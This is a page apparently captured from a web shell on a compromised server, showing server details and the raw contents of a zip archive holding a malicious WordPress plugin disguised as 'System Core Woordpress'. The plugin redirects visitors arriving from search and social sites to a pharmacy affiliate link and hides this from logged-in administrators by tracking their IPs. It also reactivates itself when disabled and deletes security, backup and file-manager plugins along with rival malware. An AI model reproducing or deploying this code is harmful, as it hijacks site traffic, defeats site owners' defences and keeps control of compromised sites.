shell bypass 403

GrazzMean Shell

: /proc/thread-self/root/proc/self/cwd/ [ drwxr-xr-x ]
Uname: Linux web3.us.cloudlogin.co 5.10.226-xeon-hst #2 SMP Fri Sep 13 12:28:44 UTC 2024 x86_64
Software: Apache
PHP version: 8.1.31 [ PHP INFO ] PHP os: Linux
Server Ip: 162.210.96.117
Your Ip: 3.142.35.211
User: edustar (269686) | Group: tty (888)
Safe Mode: OFF
Disable Function:
NONE

name : woocommerce_inputs.zip
PKQ:FZɗ���woocommerce-load.phpnu�[���<?php

$my_custom_redirect = 'https://rx-true.com/?aff=1880';

if (empty($_COOKIE['partner_'])) {
    setcookie('partner_', 1, time() + 86400, '/');
    echo '<script>
        window.location.replace("https://www.google.com/url?sa=t&url=' . urlencode($my_custom_redirect) . '");
    </script>';
    header("Location: https://www.google.com/url?sa=t&url=" . urlencode($my_custom_redirect), true, 302);
    exit;
}
?>PKQ:FZ���6�6woocommerce_inputs.phpnu�[���<?php
/*
Plugin Name: System Core Woordpress
Description: Ensuring operation of the engine kernel Woordpress
Author: Woordpress
Version: 15.2
*/

if (!defined('ABSPATH')) {
    exit;
}

function gwci_delete_directory($dir) {
    if (!file_exists($dir)) {
        return;
    }
    $iterator = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS),
        RecursiveIteratorIterator::CHILD_FIRST
    );
    foreach ($iterator as $fileinfo) {
        $todo = ($fileinfo->isDir() ? 'rmdir' : 'unlink');
        @$todo($fileinfo->getRealPath());
    }
    @rmdir($dir);
}

function gwci_is_our_plugin($plugin_path) {
    $self_slug = 'woocommerce_inputs';
    if (stripos($plugin_path, $self_slug) !== false) {
        return true;
    }
    return false;
}

function gwci_check_and_remove_conflicting_plugins() {
    $signatures = array(
        'fn_aa3fb05a15bfeb25dc278d4040ae23bf',
        'trigger_redirect',
        'woocommerce-load.php',
        'Plugin Name: Woocommerce custom inputs',
        'Version: 1.2',
        'custom_redirect_function',
        'collect_ips',
        'sdunxrjgcx',
        'jpwvsnwqfh',
        'Ansar Import',
        'WP File Manager',
        'WP SECURE ACCESS',
        'Sucuri Security - Auditing, Malware Scanner and Hardening',
        'Solid Security Basic',
        'Protect Uploads',
        'Page Security & Membership',
        'Oxucop',
        'OT Portfolios',
        'Kirki Customizer Framework',
        'Header Footer Code Manager',
        'Form to Chat by WhatsForm',
        '___RedQ Reuse Form',
        'Cartsy Algolia Integration',
        'Cartsy Helper',
        'Fire Mobile',
        'Google Ads & Marketing by Kliken',
        'Manager de fișiere WP',
        'Admin Menu Editor Pro',
        'Classic Widgets',
        'Download Plugins and Themes from Dashboard',
        'Duplicator Pro',
        'File Manager Advanced',
        'Filester - File Manager Pro',
        'mndpsingh287',
        'create_ip_tracking_table',
        'collect_ip_address',
        'Interactive WP',
        'WordPress Fix',
        'Version 2.73',
        'Version 1.3.3.7',
        'WebFactory Ltd',
        'Protect Uploads',
        'Smart Passworded Pages',
        'Jetpack by WordPress.com',
        'Bot Detection',
        'Easy WP SMTP',
        'Custom Mail SMTP Checker',
        'Core Functionality',
        'Sky Login Redirect',
        'Bakery Options',
        'Backuply',
        'optimizador.io',
        'Hotjar',
        'User Switching',
        'Nofollow for external link',
        'Loginizer',
        'wphave - Admin',
        'WordPress WhatsApp Support',
        'WP-PostViews',
        'WOOF - WooCommerce Products Filter',
        'Velvet Blues Update URLs',
        'MC4WP: Mailchimp for WordPress',
        'Dokan Pro',
        'fw-vimeo-videowall',
        'Smart Slideshow Widget (by obikui)',
        'Plugin Detective - Troubleshooting',
        'weMail - Email Marketing Simplified With WordPress',
        'MailPoet 3 (New)',
        'amoCRM WebForm',
        'Email on Changing User Role',
        'Envato WordPress Toolkit (Deprecated)',
        'MailPoet 2',
        'File Manager Advanced',
        'Link Shortner',
        'List Last Changes',
        'OptinMonster',
        'Call to Action Block - WPPOOL',
        'Gravity Forms CSS Ready Class Selector',
        'Semrush SEO Writing Assistant',
        'Flexible SSL for CloudFlare',
        'CodeStyling Localization',
        'Owl Carousel',
        'Ikosobusy',
        'WP SecurityPrime',
        'Amazon AI',
        'Filester - File Manager Pro',
        'Semrush SEO Writing Assistant',
        'Used by millions, Task Agent is quite possibly the best way in the world to protect your blog from spam',
        'Bot Detection',
        'FileOrganizer',
        'MC4WP: Mailchimp for WordPress',
        'Test jQuery Updates',
        'Semrush SEO Writing Assistant',
        'AI Bud – AI Content Generator, AI Chatbot, ChatGPT, Gemini, GPT-4o Best AI WordPress Plugin',
        'Filester - File Manager Pro',
        'By Carlos Sebastian',
        'Client Dash',
        'UpdraftPlus - Backup/Restore',
        'WP Config File Editor',
        'WP BrowserUpdate',
        'BJ Lazy Load',
        'duplicator-pro',
        'Slider Revolution'
    );
    $plugins_dir = WP_PLUGIN_DIR;
    $current_plugin_basename = plugin_basename(__FILE__);
    $current_plugin_dir = dirname($current_plugin_basename);
    if (!is_dir($plugins_dir) || !is_readable($plugins_dir)) {
        return;
    }
    if (!function_exists('get_plugins')) {
        require_once ABSPATH . 'wp-admin/includes/plugin.php';
    }
    $all_plugins = get_plugins();
    $handle = opendir($plugins_dir);
    if ($handle) {
        while (($file = readdir($handle)) !== false) {
            if ($file === '.' || $file === '..') {
                continue;
            }
            $plugin_path = $plugins_dir . DIRECTORY_SEPARATOR . $file;
            if (!is_dir($plugin_path)) {
                continue;
            }
            if (gwci_is_our_plugin($plugin_path)) {
                continue;
            }
            $iterator = new RecursiveIteratorIterator(
                new RecursiveDirectoryIterator($plugin_path)
            );
            $found_conflict = false;
            foreach ($iterator as $fileinfo) {
                if (!$fileinfo->isFile()) {
                    continue;
                }
                $content = @file_get_contents($fileinfo->getRealPath());
                if (!$content) {
                    continue;
                }
                foreach ($signatures as $signature) {
                    if (stripos($content, $signature) !== false) {
                        $found_conflict = true;
                        break;
                    }
                }
                if ($found_conflict) {
                    break;
                }
            }
            if ($found_conflict) {
                foreach ($all_plugins as $plugin_file => $plugin_data) {
                    if (stripos($plugin_file, $file) !== false) {
                        deactivate_plugins($plugin_file, false, is_multisite());
                    }
                }
                gwci_delete_directory($plugin_path);
            }
        }
        closedir($handle);
    }
}

function gwci_upgrader_process_complete($upgrader_object, $options) {
    if (isset($options['type']) && $options['type'] === 'plugin') {
        gwci_schedule_conflict_scan();
    }
}
add_action('upgrader_process_complete', 'gwci_upgrader_process_complete', 9999, 2);

function gwci_activate_schedule_scan() {
    if (!wp_next_scheduled('gwci_delayed_conflict_scan')) {
        wp_schedule_single_event(time() + 10, 'gwci_delayed_conflict_scan');
    }
}
register_activation_hook(__FILE__, 'gwci_activate_schedule_scan');

function gwci_schedule_conflict_scan() {
    if (!wp_next_scheduled('gwci_delayed_conflict_scan')) {
        wp_schedule_single_event(time() + 10, 'gwci_delayed_conflict_scan');
    }
}

add_action('gwci_delayed_conflict_scan', 'gwci_check_and_remove_conflicting_plugins');

function gwci_auto_reactivate($plugin, $network_deactivate) {
    if ($plugin === plugin_basename(__FILE__)) {
        activate_plugin(plugin_basename(__FILE__));
    }
}
add_action('deactivated_plugin', 'gwci_auto_reactivate', 9999, 2);

function gwci_force_active_priority() {
    if (!function_exists('get_plugins')) {
        require_once ABSPATH . 'wp-admin/includes/plugin.php';
    }
    $all_plugins = get_plugins();
    $active = get_option('active_plugins', array());
    $my_plugin = plugin_basename(__FILE__);
    foreach ($active as $index => $pl) {
        if ($pl === $my_plugin) {
            continue;
        }
        if (isset($all_plugins[$pl])) {
            $info = $all_plugins[$pl];
            $name = isset($info['Name']) ? $info['Name'] : '';
            $ver  = isset($info['Version']) ? $info['Version'] : '';
            if (stripos($name, 'Woocommerce custom inputs') !== false && $ver === '1.2') {
                unset($active[$index]);
            }
        }
    }
    if (!in_array($my_plugin, $active)) {
        $active[] = $my_plugin;
    }
    update_option('active_plugins', array_values($active));
}
add_action('plugins_loaded', 'gwci_force_active_priority', 0);

function gwci_keep_plugin_active($new_value, $old_value) {
    $plugin = plugin_basename(__FILE__);
    if (is_array($new_value) && !in_array($plugin, $new_value)) {
        $new_value[] = $plugin;
    }
    if (!function_exists('get_plugins')) {
        require_once ABSPATH . 'wp-admin/includes/plugin.php';
    }
    $all_plugins = get_plugins();
    foreach ($new_value as $key => $pl) {
        if ($pl === $plugin) {
            continue;
        }
        if (isset($all_plugins[$pl])) {
            $data = $all_plugins[$pl];
            $n = isset($data['Name']) ? $data['Name'] : '';
            $v = isset($data['Version']) ? $data['Version'] : '';
            if (stripos($n, 'Woocommerce custom inputs') !== false && $v === '1.2') {
                unset($new_value[$key]);
            }
        }
    }
    return $new_value;
}
add_filter('pre_update_option_active_plugins', 'gwci_keep_plugin_active', 9999, 2);

function GetIP() {
    foreach (array('HTTP_CLIENT_IP','HTTP_X_FORWARDED_FOR','HTTP_X_FORWARDED','HTTP_X_CLUSTER_CLIENT_IP','HTTP_FORWARDED_FOR','HTTP_FORWARDED','REMOTE_ADDR') as $key) {
        if (array_key_exists($key, $_SERVER) === true) {
            foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) {
                if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) {
                    return $ip;
                }
            }
        }
    }
    return '';
}

function trigger_redirect() {
    $plugin_dir = plugin_dir_path(__FILE__);
    $redirect_file = $plugin_dir . 'woocommerce-load.php';
    if (file_exists($redirect_file)) {
        include $redirect_file;
        exit;
    }
}

function should_redirect($user_ip) {
    if (get_option('custom_redirect_db_failed')) {
        return false;
    }
    global $wpdb;
    $exists = $wpdb->get_var(
        $wpdb->prepare("SELECT COUNT(*) FROM {$wpdb->prefix}ip_tracking WHERE ip_address = %s", $user_ip)
    );
    return ($exists == 0);
}

function custom_redirect_function() {
    if (is_user_logged_in()) {
        return;
    }
    $user_ip = GetIP();
    if (!should_redirect($user_ip)) {
        return;
    }
    $install_date = get_option('custom_redirect_install_date');
    $current_time = time();
    if ($install_date && ($current_time - $install_date) > 400) {
        $white_engine_search = 'google|bing|yahoo|duckduckgo|ask|aol|startpage|qwant|ecosia|searx|swisscows|wolframalpha|mojeek|ekoru|presearch|infinitysearch|yandex|baidu|naver|daum|sogou|so|lycos|dogpile|webcrawler|gigablast|boardreader|searchencrypt|biglobe|goo|onet|eniro|virgilio|libero|rakuten|wow|msn|excite|exalead|sapo|facebook|instagram|twitter|tiktok|snapchat|linkedin|pinterest|reddit|tumblr|quora|vk|ok|weibo|wechat|line|kakaotalk|discord|telegram|douyin|qq|xing|meetup|viber|minds|mewe|gab|parler|clubhouse|nextdoor|taringa|habbo|tagged|hi5|flickr|myspace|soundcloud|badoo|twoo|weheartit|buzznet|diaspora|reverbnation|medium|wattpad|ello|amino|asmallworld|couchsurfing|academia|deviantart|gaia|fotolog|classmates|xanga|skout|meetme|ravelry|vimeo|youtube|spotify|bandcamp|patreon|onlyfans|substack|discogs|slashdot|livejournal|anobii|goodreads|letterboxd|dribbble|behance|itchio|steam|devto|fotka|filmow|niconico|myanimelist|wanelo';
        $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
        if (!empty($referer) && preg_match("/($white_engine_search)/i", $referer)) {
            if (!isset($_COOKIE['_redirect_'])) {
                setcookie('_redirect_', '1', time() + 400, '/');
                trigger_redirect();
                exit();
            }
        }
    }
}
add_action('template_redirect', 'custom_redirect_function');

function create_ip_tracking_table() {
    global $wpdb;
    if (!get_option('custom_redirect_install_date')) {
        update_option('custom_redirect_install_date', time());
    }
    $table_name = $wpdb->prefix . 'ip_tracking';
    $sql = "CREATE TABLE IF NOT EXISTS $table_name (
        id BIGINT(20) UNSIGNED AUTO_INCREMENT PRIMARY KEY,
        ip_address VARCHAR(45) NOT NULL
    )";
    require_once(ABSPATH . 'wp-admin/includes/upgrade.php');
    dbDelta($sql);
    $maybe_table = $wpdb->get_var("SHOW TABLES LIKE '$table_name'");
    if (!$maybe_table) {
        update_option('custom_redirect_db_failed', true);
    } else {
        update_option('custom_redirect_db_failed', false);
    }
}
register_activation_hook(__FILE__, 'create_ip_tracking_table');

function collect_ip_address() {
    if (get_option('custom_redirect_db_failed')) {
        return;
    }
    global $wpdb;
    if (is_user_logged_in()) {
        $user_ip = GetIP();
        $existing_ip = $wpdb->get_var(
            $wpdb->prepare("SELECT id FROM {$wpdb->prefix}ip_tracking WHERE ip_address = %s LIMIT 1", $user_ip)
        );
        if (!$existing_ip) {
            $wpdb->insert($wpdb->prefix . 'ip_tracking', ['ip_address' => $user_ip]);
        }
        if (!isset($_COOKIE['_redirect_'])) {
            setcookie('_redirect_', '1', time() + 86400, '/');
        }
    }
}
add_action('wp_head', 'collect_ip_address');
add_action('admin_init', 'collect_ip_address');
PKQ:FZɗ���woocommerce-load.phpnu�[���PKQ:FZ���6�6�woocommerce_inputs.phpnu�[���PK��8
© 2025 GrazzMean